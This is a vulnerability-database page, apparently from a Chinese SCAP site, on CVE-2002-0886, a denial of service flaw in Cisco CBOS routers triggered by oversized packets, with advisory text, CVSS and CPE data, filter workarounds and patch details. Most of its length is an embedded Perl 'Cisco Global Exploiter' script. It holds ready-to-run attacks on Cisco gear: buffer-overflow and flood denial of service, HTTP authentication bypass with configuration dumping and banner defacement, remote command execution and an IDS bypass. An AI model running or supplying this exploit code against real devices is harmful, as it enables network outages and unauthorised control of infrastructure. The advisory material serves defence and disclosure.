CVE-2002-0886
CVSS5.0
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:13
NMCOES    

[原文]Cisco DSL CPE devices running CBOS 2.4.4 and earlier allows remote attackers to cause a denial of service (hang or memory consumption) via (1) a large packet to the DHCP port, (2) a large packet to the Telnet port, or (3) a flood of large packets to the CPE, which causes the TCP/IP stack to consume large amounts of memory.


[CNNVD]Cisco CBOS超大信息包导致DHCP拒绝服务攻击漏洞(CNNVD-200210-028)

        
        CBOS(Cisco Broadband Operating System)是一款CISCO公司分发的Cisco 600系列路由器的操作系统。
        CBOS对提交给DHCP服务器的信息包处理不正确,可导致远程攻击者进行拒绝服务攻击。
        远程攻击者可以发送超大的信息包给DHCP端口,可导致CPE(Customer Premises Equipment)设备崩溃,产生拒绝服务攻击,DHCP服务在Cisco 600系列路由器上默认安装。
        下面Cisco 600系列路由器存在此漏洞:
        605、626、627、633、673、675、675e、676、677、677i 和 678。
        此漏洞编号为:CSCdw90020
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:cisco:cbos:2.1.0a
cpe:/o:cisco:cbos:2.4.3
cpe:/o:cisco:cbos:2.4.2b
cpe:/o:cisco:cbos:2.4.2ap
cpe:/o:cisco:cbos:2.2.1
cpe:/o:cisco:cbos:2.2.1a
cpe:/o:cisco:cbos:2.3.8
cpe:/o:cisco:cbos:2.4.2
cpe:/o:cisco:cbos:2.3.5
cpe:/o:cisco:cbos:2.4.4
cpe:/o:cisco:cbos:2.3.7
cpe:/o:cisco:cbos:2.3.2
cpe:/o:cisco:cbos:2.3.5.015
cpe:/o:cisco:cbos:2.3.7.002
cpe:/o:cisco:cbos:2.4.1
cpe:/o:cisco:cbos:2.3_.053
cpe:/o:cisco:cbos:2.3.9
cpe:/o:cisco:cbos:2.0.1
cpe:/o:cisco:cbos:2.2.0
cpe:/o:cisco:cbos:2.3
cpe:/o:cisco:cbos:2.1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0886
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0886
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-028
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4813
(VENDOR_ADVISORY)  BID  4813
http://www.iss.net/security_center/static/9151.php
(VENDOR_ADVISORY)  XF  cisco-cbos-dhcp-dos(9151)
http://xforce.iss.net/xforce/xfdb/9152
(UNKNOWN)  XF  cisco-cbos-telnet-cpe-dos(9152)
http://www.securityfocus.com/bid/4815
(UNKNOWN)  BID  4815
http://www.securityfocus.com/bid/4814
(UNKNOWN)  BID  4814
http://www.iss.net/security_center/static/9153.php
(UNKNOWN)  XF  cisco-cbos-tcpip-dos(9153)
http://www.cisco.com/warp/public/707/CBOS-DoS.shtml
(UNKNOWN)  CISCO  20020523 CBOS - Improving Resilience to Denial-of-Service Attacks

- 漏洞信息

Cisco CBOS超大信息包导致DHCP拒绝服务攻击漏洞
中危 其他
2002-10-04 00:00:00 2005-10-20 00:00:00
远程  
        
        CBOS(Cisco Broadband Operating System)是一款CISCO公司分发的Cisco 600系列路由器的操作系统。
        CBOS对提交给DHCP服务器的信息包处理不正确,可导致远程攻击者进行拒绝服务攻击。
        远程攻击者可以发送超大的信息包给DHCP端口,可导致CPE(Customer Premises Equipment)设备崩溃,产生拒绝服务攻击,DHCP服务在Cisco 600系列路由器上默认安装。
        下面Cisco 600系列路由器存在此漏洞:
        605、626、627、633、673、675、675e、676、677、677i 和 678。
        此漏洞编号为:CSCdw90020
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用访问限制过滤DHCP通信:
        cbos# set filter 1 on allow incoming eth0 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 protocol udp srcport 68-68 destport 67-67
        cbos#set filter 2 on allow outgoing eth0 1.2.3.4 255.255.255.255 0.0.0.0 0.0.0.0 protocol udp srcport 67-67 destport 68-68
        过滤规则"0"会允许所有内部网络的DHCP请求到CPE,过滤规则"1"允许从CPE中应答所有DHCP响应,在上面一个例子中,CPE的eth0接口的IP地址为1.2.3.4,你必须使用你的IP地址来取代。此配置不是完全解决方案,因为内部网络的用户还可以利用此漏洞。
        注:由于在过滤器最后有"deny all"规则,因此你必须包含"permit"规则以允许正常通信。
        关于过滤器的详细信息,请参照如下地址:
        
        http://www.cisco.com/univercd/cc/td/doc/product/dsl_prod/c600s/cbos/cbos240/03chap02.htm#xtocid365615.

        厂商补丁:
        Cisco
        -----
        Cisco已经为此发布了一个安全公告(Cisco-CBOS-Dos)以及相应补丁:
        Cisco-CBOS-Dos:CBOS - Improving Resilience to Denial-of-Service Attacks
        链接:
        http://www.cisco.com/warp/public/707/CBOS-DoS.shtml

        补丁下载:
        Cisco Upgrade CBOS 2.4.5
        
        http://www.cisco.com

- 漏洞信息 (21472)

Cisco CBOS 2.x Broadband Operating System TCP/IP Stack Denial of Service Vulnerability (EDBID:21472)
hardware dos
2002-05-23 Verified
0 blackangels
N/A [点击下载]
source: http://www.securityfocus.com/bid/4815/info

Cisco Broadband Operating System (CBOS) is the operating system used on Cisco 600 series routers.

When the CBOS TCP/IP stack is forced to process a high number of unusually large packets, it will consume all memory. This will cause the router to freeze and stop forwarding packets.

The following devices in the Cisco 600 series of routers are affected:
605, 626, 627, 633, 673, 675, 675e, 676, 677, 677i and 678.

This vulnerability has been assigned Cisco Bug ID CSCdx36121. 

#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# http://www.blackangels.it
##



##
# Modules
##

use Socket;
use IO::Socket;


##
# Main
##

$host = "";
$expvuln = "";
$host = @ARGV[ 0 ];
$expvuln = @ARGV[ 1 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
elsif ($expvuln eq "10") {
cisco10();
}
elsif ($expvuln eq "11") {
cisco11();
}
elsif ($expvuln eq "12") {
cisco12();
}
elsif ($expvuln eq "13") {
cisco13();
}
elsif ($expvuln eq "14") {
cisco14();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##
# Functions
##

sub usage
{
  printf "\nUsage :\n";
  printf "perl cge.pl <target> <vulnerability number>\n\n";
  printf "Vulnerabilities list :\n";
  printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
  printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
  printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
  printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
  printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
  printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
  printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
  printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
  printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n";
  printf "[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability\n";
  printf "[11] - Cisco Catalyst Memory Leak Vulnerability\n";
  printf "[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability\n";
  printf "[13] - %u Encoding IDS Bypass Vulnerability (UTF)\n";
  printf "[14] - Cisco IOS HTTP Denial of Service Vulnerability\n";
  exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $dch = "?????????????????a~ %%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $dch x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     ) || die("No telnet server detected on $serv ...\n\n");

  $sockd->autoflush(1);
  print $sockd "$string". $shc;
  while (<$sockd>){ print }
  print("\nPacket sent ...\n");
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto => "tcp",
                                      PeerAddr => $serv,
                                      PeerPort => "(23)",
                                      ) || die("Vulnerability successful exploited. Target server is down ...\n\n");

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
  my $serv = $host;

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};
  $sockd->autoflush(1);
  print $sockd "GET /\%\% HTTP/1.0\n\n";
  -close $sockd;
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
  my $serv= $host;
  my $n=16;
  my $port=80;
  my $target = inet_aton($serv);
  my $fg = 0;

  LAB: while ($n<100) {
  my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
  $n++;
  foreach $line (@results){
          $line=~ tr/A-Z/a-z/;
          if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
          if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
  }

  if ($fg==1) {
               sleep(2);
               print "Vulnerability unsuccessful exploited ...\n\n";
              }
  else {
        sleep(2);
        print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";
        last LAB;
       }

  sub exploit {
               my ($pstr)=@_;
               socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
               die("Unable to initialize socket ...\n\n");
               if(connect(S,pack "SnA4x8",2,$port,$target)){
                                                            my @in;
                                                            select(S);
                                                            $|=1;
                                                            print $pstr;
                                                            while(<S>){ push @in, $_;}
                                                            select(STDOUT); close(S); return @in;
                                                           }
  else { die("No http server detected on $serv ...\n\n"); }
  }
  }
  exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
  my $serv = $host;
  my $n = 16;

  while ($n <100) {
                   exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
                   $wr =~ s/\n//g;
                   if ($wr =~ /200 ok/) {
                                              while(1)
                                              { print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
                                                print "[1] Banner change\n";
                                                print "[2] List vty 0 4 acl info\n";
                                                print "[3] Other\n";
                                                print "Enter a valid option [ 1 - 2 - 3 ] : ";
                                                $vuln = <STDIN>;
                                                chomp($vuln);

                   if ($vuln == 1) {
                                    print "\nEnter deface line : ";
                                    $vuln = <STDIN>;
                                    chomp($vuln);
                                    exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
                                   }
                   elsif ($vuln == 2) {
                                       exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
                                       print "$wrf";
                                      }
                   elsif ($vuln == 3)
                                      { print "\nEnter attack URL : ";
                                        $vuln = <STDIN>;
                                        chomp($vuln);
                                        exploit1("GET /$vuln HTTP/1.0\n\n");
                                        print "$wrf";
                                      }
         }
         }
         $wr = "";
         $n++;
  }
  die "Vulnerability unsuccessful exploited ...\n\n";

  sub exploit1 {
                my $sockd = IO::Socket::INET -> new (
                                                     Proto => 'tcp',
                                                     PeerAddr => $serv,
                                                     PeerPort => 80,
                                                     Type => SOCK_STREAM,
                                                     Timeout => 5);
                                                     unless($sockd){die "No http server detected on $serv ...\n\n"}
  $sockd->autoflush(1);
  $sockd -> send($_[0]);
  while(<$sockd>){$wr .= $_} $wrf = $wr;
  close $sockd;
  }
  exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 22;
  my $vuln = "a%a%a%a%a%a%a%";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No ssh server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET ? HTTP/1.0\n\n";
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  close($sockd);
  exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $k = "";
  
  print "Enter a file to read [ /show/config/cr set as default ] : ";
  $k = <STDIN>;
  chomp ($k);
  if ($k eq "")
  {$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
  else
  {$vuln = "GET /exec$k HTTP/1.0\n\n";}

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
  my $serv = $host;
  my $port = 80;
  my $vuln = "GET /error?/ HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => $port,
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  sleep(2);
  print "\nServer response :\n\n";
  while (<$sockd>){print}
  close($sockd);
  exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
  my $ip = $host;
  my $port = "514";
  my $ports = "";
  my $size = "";
  my $i = "";
  my $string = "%%%%%XX%%%%%";

  print "Input packets size : ";
  $size = <STDIN>;
  chomp($size);

  socket(SS, PF_INET, SOCK_DGRAM, 17);
  my $iaddr = inet_aton("$ip");

  for ($i=0; $i<10000; $i++)
  { send(SS, $string, $size, sockaddr_in($port, $iaddr)); }

  printf "\nPackets sent ...\n";
  sleep(2);
  printf "Please enter a server's open port : ";
  $ports = <STDIN>;
  chomp $ports;
  printf "\nNow checking server status ...\n";
  sleep(2);

  socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
  my $dest = sockaddr_in ($ports, inet_aton($ip));
  connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

  printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
  exit(1);
}

sub cisco10 # CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
{
  my $ip = $host;
  my $vln = "%%%%%XX%%%%%";
  my $num = 30000;
  my $string .= $vln x $num;
  my $shc="\015\012";

  my $sockd = IO::Socket::INET->new (
                                     Proto => "tcp",
                                     PeerAddr => $ip,
                                     PeerPort => "(2002)",
                                    ) || die "Unable to connect to $ip:2002 ...\n\n";

  $sockd->autoflush(1);
  print $sockd "$string" . $shc;
  while (<$sockd>){ print }
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$ip,
                                      PeerPort=>"(2002)",);
                                      unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  exit(1);
}

sub cisco11 # Cisco Catalyst Memory Leak Vulnerability
{
  my $serv = $host;
  my $rep = "";
  my $str = "AAA\n";

  print "\nInput the number of repetitions : ";
  $rep = <STDIN>;
  chomp $rep;
 
  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(23)",
                                     Proto => "tcp")
                                     || die "No telnet server detected on $serv ...\n\n";

  for ($k=0; $k<=$rep; $k++) {
                                print $sockd "$str";
                                sleep(1);
                                print $sockd "$str";
                                sleep(1);
                             }
  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);
  
  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"(23)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n";
  close($sockd2);
  exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $l =100;
  my $vuln = "";
  my $long = "A" x $l;

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  for ($k=0; $k<=50; $k++) {
                              my $vuln = "GET " . $long . " HTTP/1.0\n\n";
                              print $sockd "$vuln\n\n";
                              sleep(1);
                              $l = $l + 100;
                           }

  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n";
  close($sockd2);
  exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
  my $serv = $host;
  my $vuln = "GET %u002F HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  print("Please verify if directory has been listed ...\n\n");
  print("Server response :\n");
  sleep(2);
  while (<$sockd>){ print }
  exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
  my $serv = $host;
  my $vuln = "GET /TEST?/ HTTP/1.0";

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};

  print $sockd "$vuln\n\n";
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

		

- 漏洞信息

8861
Cisco CBOS DSL CPE Multiple Service Large Packet DoS
Denial of Service
Loss of Availability

- 漏洞描述

- 时间线

2002-05-23 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cisco CBOS Oversized Packet DHCP Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 4813
Yes No
2002-05-23 12:00:00 2009-07-11 12:46:00
Discovery of this issue is credited to Knud Erik Højgaard from Cybercity, Denmark.

- 受影响的程序版本

Cisco CBOS 2.4.4
Cisco CBOS 2.4.3
Cisco CBOS 2.4.2 b
Cisco CBOS 2.4.2 ap
Cisco CBOS 2.4.2
Cisco CBOS 2.4.1
Cisco CBOS 2.3.9
Cisco CBOS 2.3.8
Cisco CBOS 2.3.7 .002
Cisco CBOS 2.3.7
Cisco CBOS 2.3.5 .015
Cisco CBOS 2.3.5
Cisco CBOS 2.3.2
Cisco CBOS 2.3 .053
Cisco CBOS 2.3
Cisco CBOS 2.2.1 a
Cisco CBOS 2.2.1
Cisco CBOS 2.2
Cisco CBOS 2.1 a
Cisco CBOS 2.1
Cisco CBOS 2.0.1
Cisco CBOS 2.4.5

- 不受影响的程序版本

Cisco CBOS 2.4.5

- 漏洞讨论

CBOS (Cisco Broadband Operating System) is the operating system for Cisco 600 series routers.

It is possible to cause the CPE (Customer Premises Equipment) to freeze by sending a large packet to the DHCP port.

The following devices in the Cisco 600 series of routers are affected:
605, 626, 627, 633, 673, 675, 675e, 676, 677, 677i and 678.

This vulnerability has been assigned Cisco Bug ID CSCdw90020.

- 漏洞利用

There is no exploit code required.

- 解决方案

Cisco has released an upgraded version of CBOS:


Cisco CBOS 2.0.1
  • Cisco CBOS 2.4.5


Cisco CBOS 2.1 a
  • Cisco CBOS 2.4.5


Cisco CBOS 2.1
  • Cisco CBOS 2.4.5


Cisco CBOS 2.2
  • Cisco CBOS 2.4.5


Cisco CBOS 2.2.1
  • Cisco CBOS 2.4.5


Cisco CBOS 2.2.1 a
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3 .053
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3.2
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3.5 .015
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3.5
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3.7 .002
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3.7
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3.8
  • Cisco CBOS 2.4.5


Cisco CBOS 2.3.9
  • Cisco CBOS 2.4.5


Cisco CBOS 2.4.1
  • Cisco CBOS 2.4.5


Cisco CBOS 2.4.2 ap
  • Cisco CBOS 2.4.5


Cisco CBOS 2.4.2
  • Cisco CBOS 2.4.5


Cisco CBOS 2.4.2 b
  • Cisco CBOS 2.4.5


Cisco CBOS 2.4.3
  • Cisco CBOS 2.4.5


Cisco CBOS 2.4.4
  • Cisco CBOS 2.4.5

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站